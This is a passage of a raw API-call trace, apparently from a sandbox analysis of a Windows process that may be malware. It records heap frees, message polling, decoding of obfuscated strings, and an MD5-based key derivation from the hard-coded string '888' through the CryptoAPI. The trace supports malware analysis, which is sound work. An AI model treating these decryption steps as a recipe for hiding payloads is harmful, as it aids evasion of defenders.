hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.239] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0122.239] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0122.241] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0122.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0122.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0122.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.242] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0122.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0122.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0122.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0122.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0122.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0122.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0122.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0122.242] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0122.242] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.242] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0122.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0122.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0122.243] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.243] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0122.243] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.243] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.243] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.250] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.252] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.252] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.252] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0122.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0122.252] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.252] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.252] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0122.252] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.253] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0122.253] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0122.253] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fe0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0122.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0122.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7060, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0122.253] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9beb38) returned 1 [0122.254] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.254] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.254] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0122.254] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.254] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0122.254] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.254] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.254] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.254] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.254] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.254] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.254] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0122.254] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.254] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0122.254] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.254] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.254] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.255] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.255] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.255] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.255] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.255] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0122.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.255] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0122.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.258] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.259] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0122.259] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.259] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0122.259] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.259] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.259] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.259] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.259] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.259] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.259] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.259] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.259] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.259] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0122.259] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.259] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0122.259] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.259] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.259] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.259] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.259] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.259] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.259] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.259] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.260] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.260] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.260] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.260] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0122.260] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.260] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0122.260] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.260] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.260] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa348, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0122.260] CryptCreateHash (in: hProv=0x9beb38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0122.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0122.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0122.260] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0122.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0122.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bf8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0122.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.261] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.261] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.261] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.261] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.261] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.261] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa3a8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0122.261] CryptHashData (hHash=0x9a47c0, pbData=0x2a71d08, dwDataLen=0x3, dwFlags=0x1) returned 1 [0122.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.261] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.261] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.261] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.261] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.261] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.261] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0122.261] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.261] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0122.261] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.261] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.262] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, 